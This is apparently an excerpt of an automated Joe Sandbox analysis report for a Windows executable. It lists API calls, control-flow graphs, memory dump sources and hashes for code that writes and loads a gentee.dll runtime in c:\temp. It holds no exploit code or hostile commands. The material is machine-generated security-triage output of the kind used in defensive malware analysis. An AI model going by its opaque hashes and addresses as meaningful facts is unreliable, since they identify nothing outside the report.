                                            • GetFileAttributesA.KERNELBASE(?,?,?,?,?,?,004019D8,00000000,00000000,?,?,-00000400,?,?,00000000), ref: 004016FF
                                            • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000,?,?,?,?,?,004019D8,00000000,00000000,?), ref: 0040171A
                                            • lstrcpyA.KERNEL32(?,c:\temp,?,?,?,?,?,004019D8,00000000,00000000,?,?,-00000400,?,?,00000000), ref: 00401739
                                            • CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,?,004019D8,00000000,00000000,?,?,-00000400,?,?,00000000), ref: 00401741
                                            • wsprintfA.USER32 ref: 00401753
                                            • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,004019D8,00000000,00000000,?,?,-00000400), ref: 0040175D
                                            • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,004019D8,00000000), ref: 004017D7
                                            • CloseHandle.KERNELBASE(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,004019D8,00000000,00000000), ref: 004017EC
                                            • lstrcpyA.KERNEL32(?,Cannot create gentee.dll!,?,?,00000000,?,?,?,?,?,?,?,?,?,004019D8,00000000), ref: 004017FD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2109673953.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2109662170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2109685375.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2109696404.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2109707809.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: File$AttributesCreatelstrcpylstrlenwsprintf$CloseDirectoryHandlePathTempWrite
                                            • String ID: %s\genteert.dll$Cannot create gentee.dll!$c:\temp
                                            • API String ID: 2429222215-2252134850
                                            • Opcode ID: 8a3f478474cb178c0db6a781311e9bbebcfb1379b92b38a38e3dc45cd2d4445c
                                            • Instruction ID: 67627f2e786aaddb3fd4ed1d4e819a884a497af34afd47e88a40c4d4d8adc77f
                                            • Opcode Fuzzy Hash: 8a3f478474cb178c0db6a781311e9bbebcfb1379b92b38a38e3dc45cd2d4445c
                                            • Instruction Fuzzy Hash: 2A41D471204300ABE210AB61DE88F6B7B68EB85715F10443AF701B32E1CBB9A805D779

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 80 10003c00-10003c1b malloc 81 10003c20-10003c22 80->81 82 10003c24 81->82 83 10003c26-10003c3b 81->83 82->83 83->81 84 10003c3d-10003cbb malloc call 10003e70 InitializeCriticalSection call 10003980 83->84 89 10003cbd-10003cd6 CharLowerA 84->89 90 10003ce8-10003cee 89->90 91 10003cd8-10003cdb 89->91 92 10003cf0-10003cf3 90->92 93 10003d15-10003d1b 90->93 91->90 94 10003cdd-10003ce6 91->94 96 10003cf5-10003cf8 92->96 97 10003cfa-10003cfd 92->97 95 10003d1f-10003d26 93->95 94->95 95->89 100 10003d28-10003d3b 95->100 96->93 96->97 98 10003d04-10003d07 97->98 99 10003cff-10003d02 97->99 98->93 101 10003d09-10003d13 98->101 99->93 99->98 102 10003d3f-10003d42 100->102 101->95 103 10003d44-10003d47 102->103 104 10003d59-10003d68 102->104 103->104 105 10003d49-10003d57 103->105 106 10003d6b-10003d71 104->106 105->106 106->102 107 10003d73 106->107 108 10003d75-10003d7f 107->108 109 10003d81-10003d83 108->109 110 10003d92-10003d9f 108->110 109->110 111 10003d85-10003d90 109->111 112 10003da2-10003da9 110->112 111->112 112->108 113 10003dab-10003db0 112->113
                                            APIs
                                            • malloc.MSVCRT ref: 10003C0C
                                            • malloc.MSVCRT ref: 10003C51
                                            • InitializeCriticalSection.KERNEL32(1000D2E0,00000000,00001400,00001400), ref: 10003C6E
                                            • CharLowerA.USER32(00000000,00000500), ref: 10003CBE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: malloc$CharCriticalInitializeLowerSection
                                            • String ID:
                                            • API String ID: 1963527391-0
                                            • Opcode ID: 2fea42c86315bfe1481c1987a6753dc238810363eafcdcdaa48903890fab695d
                                            • Instruction ID: 51651d1a03007351202afa30bb3bb704e0063df465590a1688396c568ca457f4
                                            • Opcode Fuzzy Hash: 2fea42c86315bfe1481c1987a6753dc238810363eafcdcdaa48903890fab695d
                                            • Instruction Fuzzy Hash: F941CA359042618FF312EB18D8D4B8EBBA6E7563D4F15816BC5918B3BEC275CC82C7A1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 114 10003980-10003999 EnterCriticalSection 115 100039c6-100039e2 call 10003950 114->115 116 1000399b-100039c3 malloc LeaveCriticalSection 114->116 119 100039e4-100039f5 115->119 120 10003a05-10003a0b 119->120 121 100039f7-100039f8 call 100038c0 119->121 123 10003a27-10003a3c 120->123 124 10003a0d-10003a10 120->124 126 100039fd-100039ff 121->126 125 10003a5d 123->125 127 10003a12-10003a18 124->127 128 10003a3e-10003a5a 124->128 129 10003a63-10003a74 LeaveCriticalSection 125->129 126->129 130 10003a01 126->130 131 10003a24-10003a25 127->131 132 10003a1a-10003a22 127->132 128->125 130->120 131->119 132->119
                                            APIs
                                            • EnterCriticalSection.KERNEL32(1000D2E0,?,00008000,?,?,100021F2,00008000,?,?,?,?,?,10002D96,?,00008000,?), ref: 10003989
                                            • malloc.MSVCRT ref: 1000399F
                                            • LeaveCriticalSection.KERNEL32(1000D2E0,?,?,?,10002D96,?,00008000,?,00008000), ref: 100039B7
                                            • LeaveCriticalSection.KERNEL32(1000D2E0,100021F2,?,00008000,?,?,100021F2,00008000,?,?,?,?,?,10002D96,?,00008000), ref: 10003A68
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: CriticalSection$Leave$Entermalloc
                                            • String ID:
                                            • API String ID: 3130977980-0
                                            • Opcode ID: 84fdffb65d4ef5215195cbda2d5d2bc33cc19ca858326295f9bce40fb6ff787b
                                            • Instruction ID: d25bee814d14efda30f1464362f07031c0896e54ac39c5d7f6b7dd260b70e25f
                                            • Opcode Fuzzy Hash: 84fdffb65d4ef5215195cbda2d5d2bc33cc19ca858326295f9bce40fb6ff787b
                                            • Instruction Fuzzy Hash: C831C275600302CFE321DF19C89085BBBE9FF863D0324812EE69543709C731B906CB62

                                            Control-flow Graph

                                            APIs
                                            • EnterCriticalSection.KERNEL32(1000D2E0,?,1000343D,10002DB8,?,100069F9,?,-00000001,?,?,1000516B,1000D240,1000D240,?,10002DB8), ref: 10003B4E
                                            • free.MSVCRT ref: 10003B6A
                                            • LeaveCriticalSection.KERNEL32(1000D2E0,10002DB8), ref: 10003B77
                                            • LeaveCriticalSection.KERNEL32(1000D2E0,?,100069F9,?,-00000001,?,?,1000516B,1000D240,1000D240,?,10002DB8), ref: 10003BB9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: CriticalSection$Leave$Enterfree
                                            • String ID:
                                            • API String ID: 3634772007-0
                                            • Opcode ID: ef82aced2ef61d46468018d6ff9b6c43efccf280279c7c0ea65ebc34c90fa554
                                            • Instruction ID: 846816d5a6104c22fdc160fc1011475c9e8aa1a9bd04d901e8fdfeab3ad9ac32
                                            • Opcode Fuzzy Hash: ef82aced2ef61d46468018d6ff9b6c43efccf280279c7c0ea65ebc34c90fa554
                                            • Instruction Fuzzy Hash: 5301F7B55001118FE314DF18C890EDABBE4FF5A390706C2AAE9418731EC771D982CBE0

                                            Control-flow Graph

                                            APIs
                                            • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 100056D2
                                              • Part of subcall function 10005AF0: CreateFileA.KERNELBASE(1000D329,1000D32C,1000D329,00000000,1000D329,00000000,00000000,10005CC3,1000D32C,00000006,1000D32C,00000000,00000000,?,1000D32C,10006518), ref: 10005B34
                                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 100056EA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: CreateFileHandleLibraryLoadModule
                                            • String ID:
                                            • API String ID: 3230317097-0
                                            • Opcode ID: e231578acc43963604cd00fc2ab4634b14236b7c52a40841d6216e3b0cf3b7aa
                                            • Instruction ID: 217a19c331d329f0d3a28da38208d12c731110efd849884d42853dc6c258a9ef
                                            • Opcode Fuzzy Hash: e231578acc43963604cd00fc2ab4634b14236b7c52a40841d6216e3b0cf3b7aa
                                            • Instruction Fuzzy Hash: 74315EB9514302AAF214DF60DD85E6B73ECEF846C1F808A1CF94597149EB76F9088732

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 181 10002a73-10002a7b 182 10002a7d-10002a8c call 100040a0 181->182 183 10002a8f-10002a99 181->183 182->183 184 10002ab1-10002ab8 183->184 185 10002a9b-10002aaf 183->185 188 10002aba-10002abe 184->188 189 10002adc-10002ae2 CreateThread 184->189 185->184 185->185 190 10002ac0-10002ac6 188->190 191 10002ac8-10002ada 188->191 192 10002ae5-10002aec 189->192 190->192 191->192 193 10002afc-10002b01 192->193 194 10002aee-10002af9 192->194 197 10002b03-10002b08 193->197 198 10002b0b-10002b0f 193->198 194->193 197->198 199 10002b11-10002b16 198->199 200 10002b19-10002b22 198->200 199->200
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 880c007e9fc92a07e8f22be8c8de1945a245b6134a3ba7f8b93c25380affa960
                                            • Instruction ID: 531355096d3f714bfa36a90036cff5c6a1bd243fed94c587f193591dac95b274
                                            • Opcode Fuzzy Hash: 880c007e9fc92a07e8f22be8c8de1945a245b6134a3ba7f8b93c25380affa960
                                            • Instruction Fuzzy Hash: 70219DB0A00646EFEB10CF64D49469EBBF1FF09394B10C169E85A9B705D730EAA0CB91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 201 10005af0-10005af6 202 10005af8-10005afd 201->202 203 10005aff-10005b0a 201->203 204 10005b0d-10005b43 CreateFileA 202->204 203->204
                                            APIs
                                            • CreateFileA.KERNELBASE(1000D329,1000D32C,1000D329,00000000,1000D329,00000000,00000000,10005CC3,1000D32C,00000006,1000D32C,00000000,00000000,?,1000D32C,10006518), ref: 10005B34
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 3659d475e362d335d01b14539a5f81eace271aecee077a4a36492414b6550c6b
                                            • Instruction ID: 87c82cc404fc1d1b93a748627a3eef174cd00deefbb92a33f0e9bf067a698d98
                                            • Opcode Fuzzy Hash: 3659d475e362d335d01b14539a5f81eace271aecee077a4a36492414b6550c6b
                                            • Instruction Fuzzy Hash: 5FF065717A05055FF708CA78CC92F7A73C6D7C2766F04D72CB563C62D5DA6898458710

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 209 10005f90-10005fb0 CompareStringA 210 10005fb2-10005fb5 209->210 211 10005fb8-10005fc2 209->211
                                            APIs
                                            • CompareStringA.KERNELBASE(00000400,00000001,?,?,?,?), ref: 10005FA7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: CompareString
                                            • String ID:
                                            • API String ID: 1825529933-0
                                            • Opcode ID: dc59a5c634376777b60424da985bbba5271a00ec94fd7bbd9c112320441256eb
                                            • Instruction ID: c3ee73b0c24b31814485c126e6f452742adc99081cf66c7f51e3c927bee69803
                                            • Opcode Fuzzy Hash: dc59a5c634376777b60424da985bbba5271a00ec94fd7bbd9c112320441256eb
                                            • Instruction Fuzzy Hash: 35D0E2BA214200AAE20486208885E2FA759E7D07A1F20CA0DF552C21D0C6B0DC408621

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 205 10005bc0-10005bdf WriteFile 206 10005be1-10005be7 205->206 207 10005be9 205->207 206->207 208 10005beb-10005bec 206->208 207->208
                                            APIs
                                            • WriteFile.KERNELBASE(?,00000000,?,?,00000000,?,1000567B,00000000,?,?,00000000,00000006,0000072B,?,?,?), ref: 10005BD7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: 10d4c48fe2f257aa3f376171600596026bbae0a9fdc2413f1b194d112be2c3b3
                                            • Instruction ID: 72ae423c7c48a8c428be45600094529c93f2317880e56116f5c1fd3dc26f2978
                                            • Opcode Fuzzy Hash: 10d4c48fe2f257aa3f376171600596026bbae0a9fdc2413f1b194d112be2c3b3
                                            • Instruction Fuzzy Hash: 10E0E235208322ABE240CB61DC85EABB7E8FB84A90F048D0EB490C3188D330FC45CBA1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 212 10005960-1000596f CreateDirectoryA
                                            APIs
                                            • CreateDirectoryA.KERNELBASE(?,00000000,10005D54,1000D32C,1000D32C,1000D32C,-00000004,1000D32C,1000D32C,00000006,1000D32C,00000000,00000000,?,1000D32C,10006518), ref: 10005969
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: CreateDirectory
                                            • String ID:
                                            • API String ID: 4241100979-0
                                            • Opcode ID: c10dd83b603b1675711886ef5e216319622d4f2186c3a64ab17e7529833a8229
                                            • Instruction ID: 85e45307c5f3ba5fa496d9109c6968c8a2fd2daeb29098098dbc9facdb212021
                                            • Opcode Fuzzy Hash: c10dd83b603b1675711886ef5e216319622d4f2186c3a64ab17e7529833a8229
                                            • Instruction Fuzzy Hash: E2B012B1200200AFD204CB50C994F077360BBD9700F008918F305CB094C635D844CB10

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 213 10005980-1000598d RemoveDirectoryA
                                            APIs
                                            • RemoveDirectoryA.KERNELBASE(?,10005A80,?,?), ref: 10005987
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: DirectoryRemove
                                            • String ID:
                                            • API String ID: 597925465-0
                                            • Opcode ID: e6a0045e4a7a2b5587952e67f46e3606ab45a050d6deb287eb5d986bf89090c5
                                            • Instruction ID: 12a01fa5a8db9371b8e58903829511990cfacd9d3e1f2d2ec9e6753e2fb720dc
                                            • Opcode Fuzzy Hash: e6a0045e4a7a2b5587952e67f46e3606ab45a050d6deb287eb5d986bf89090c5
                                            • Instruction Fuzzy Hash: B5B012B0100100DFD204CB10C584C0673A0BBD93007008518F10183214C634DC00CA20

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 214 100038c0-100038f1 malloc 215 100038f3-100038f5 214->215 216 100038f8-1000391a call 10003fb0 214->216
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: malloc
                                            • String ID:
                                            • API String ID: 2803490479-0
                                            • Opcode ID: 9b5fb2fde61c963a9065f80053a4989916ca2246b3493a75608c5e8d6db28dcf
                                            • Instruction ID: cee3fbfabc76a55cf89959beb2690333f67805e97c05a8911fcac20925ee8c72
                                            • Opcode Fuzzy Hash: 9b5fb2fde61c963a9065f80053a4989916ca2246b3493a75608c5e8d6db28dcf
                                            • Instruction Fuzzy Hash: F5F05EB6A006176BD310CF1CE841BD6F3E8EB94358F01853AF219D7644DBB0A955CBD0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 219 401c20-401c34 VirtualAlloc
                                            APIs
                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,004019C2,-00000400,?,?,00000000), ref: 00401C2E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2109673953.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2109662170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2109685375.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2109696404.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2109707809.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: a20277a400fb642be710d4869ec2bcd9b4db83fc23c0e093b7f6ca33a819f6e2
                                            • Instruction ID: e052ad54e148c9824dea0ff193791d118479de1e911c6314483e4476b70d5c08
                                            • Opcode Fuzzy Hash: a20277a400fb642be710d4869ec2bcd9b4db83fc23c0e093b7f6ca33a819f6e2
                                            • Instruction Fuzzy Hash: 31B012B13843007BF110D7408F0AF1B7758A754F01F104010B304A90C0C2F06800C62D
                                            APIs
                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040153E,?,?,004014AE,00000000), ref: 00401C4C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2109673953.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2109662170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2109685375.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2109696404.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2109707809.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: FreeVirtual
                                            • String ID:
                                            • API String ID: 1263568516-0
                                            • Opcode ID: 3452eea8fc26a77c091418c712361d3ad82bdca17a95aecdddbe1dfae72c4888
                                            • Instruction ID: 077609c2f21f1435d8c09927994ad9a076a1c16938dec3d85cfe3e8101f243b7
                                            • Opcode Fuzzy Hash: 3452eea8fc26a77c091418c712361d3ad82bdca17a95aecdddbe1dfae72c4888
                                            • Instruction Fuzzy Hash: 48B012B174030077D510DB508F0DF0773546750B00F1084107344A50C0C6B4B404CB1C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 6
                                            • API String ID: 0-498629140
                                            • Opcode ID: c38a232ed20ba8e24907c670369c1595ba032e8a13388d9657823522de41902a
                                            • Instruction ID: 1b3f4af497888b53fd365281aeb5f2a41ec7bc63058a9c565f656c0d3baf4bf9
                                            • Opcode Fuzzy Hash: c38a232ed20ba8e24907c670369c1595ba032e8a13388d9657823522de41902a
                                            • Instruction Fuzzy Hash: F5C15975A047429FD314CF68C88095AB7E5FF88380F154E2DE999C7749E734E909CBA2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aaefbdbe425c5aa7fb846bd34d1eb0f4a8a19ee6af318a2a42404b456b852010
                                            • Instruction ID: 082d9aa7fd4a7b989eb4da39068a55256bcff8a997aa6241da3f3cac159174e0
                                            • Opcode Fuzzy Hash: aaefbdbe425c5aa7fb846bd34d1eb0f4a8a19ee6af318a2a42404b456b852010
                                            • Instruction Fuzzy Hash: 2371FBBB60D2928ED3559F3DA0514EAFBE1EFAA310725987FD2C0C7351E231049AC768
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e8541f79a5917ebf91703c51342671e0f2fce44a9db1cf0587c90437a07ee874
                                            • Instruction ID: d05f88d7f58b849e829ed68ad8b4b62817e379a5dedabc82ffe129ed719ec729
                                            • Opcode Fuzzy Hash: e8541f79a5917ebf91703c51342671e0f2fce44a9db1cf0587c90437a07ee874
                                            • Instruction Fuzzy Hash: E2518331A083934BE321DF258480766FBE2FB992C4F5A456CCAC05735AD735EE46C790
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2109673953.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
